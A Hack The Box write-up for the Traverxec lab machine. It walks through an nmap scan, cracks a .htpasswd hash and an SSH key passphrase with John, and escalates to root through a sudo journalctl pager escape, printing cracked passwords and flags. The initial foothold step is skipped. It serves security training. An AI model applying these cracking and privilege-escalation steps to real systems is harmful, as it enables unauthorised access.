hackthebox travexec

Traverxec is a box labeled Easy. Initial foothold consists of exploitation of improper security settings, followed by exploit of a UNIX binary to bypass local security restrictions.

Enumeration reveals two open ports: SSH and HTTP

root@kali:~/projects/Traverxec# nmap -sS -Pn -A 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-23 05:25 EST
Nmap scan report for 10.10.10.165
Host is up (0.021s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

Browsing to http://10.10.10.165/img/portfolio/ we notice webpage is using nostromo 1.9.6

Run Linenum and notice a http password

[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

Break it with john. Password is Nowonly4me

root@kali:~/projects/Traverxec# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me       (david)

Found a backup of the SSH public and private keys in tmp/.fuckoff

Convert the RSA key to a format that’s recognizable by John

root@kali:~/projects/Traverxec/keys# /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

Break the password using John. Password is hunter

root@kali:~/projects/Traverxec/keys# /usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:05 DONE (2019-11-24 12:10) 0.1949g/s 2795Kp/s 2795Kc/s 2795KC/sa6_123..*7¡Vamos!
Session completed

Login using the key and password. Collect the user hash

# ssh -i id_rsa david@10.10.10.165
david@traverxec:~$ cat ~/user.txt 
7db0b48469606a42cec20750d9782f3d

Visit https://gtfobins.github.io/ - this is a curated list of UNIX binaries that can be exploited by an attacker to bypass local security restrictions. It's a resources that I've used countless times and I recommend it to anyone preparing for certification exams.

Script server-stats.sh located in /home/david/bin/ contains a command executed using sudo. It’s vulnerable to breaking out from the restricted environment.

https://gtfobins.github.io/gtfobins/journalctl/

david@traverxec:~/bin$ ls ~/bin/server-stats.sh 
/home/david/bin/server-stats.sh
david@traverxec:~/bin$ tail 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

Invoke the command and break out from the restriced env

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service 
-- Logs begin at Sun 2019-11-24 13:32:42 EST, end at Sun 2019-11-24 13:40:20 EST. --
Nov 24 13:39:48 traverxec sudo[24788]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/11 ruser=www-data r
Nov 24 13:39:50 traverxec sudo[24788]: pam_unix(sudo:auth): conversation failed
Nov 24 13:39:50 traverxec sudo[24788]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Nov 24 13:39:50 traverxec sudo[24788]: www-data : command not allowed ; TTY=pts/11 ; PWD=/tmp ; USER=root ; COMMAND=list
Nov 24 13:40:08 traverxec crontab[25707]: (www-data) LIST (www-data)
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

Get the root user flag located in folder /root

# cat root.txt	
9aa36a6d76f785dfd320a478f6e0d906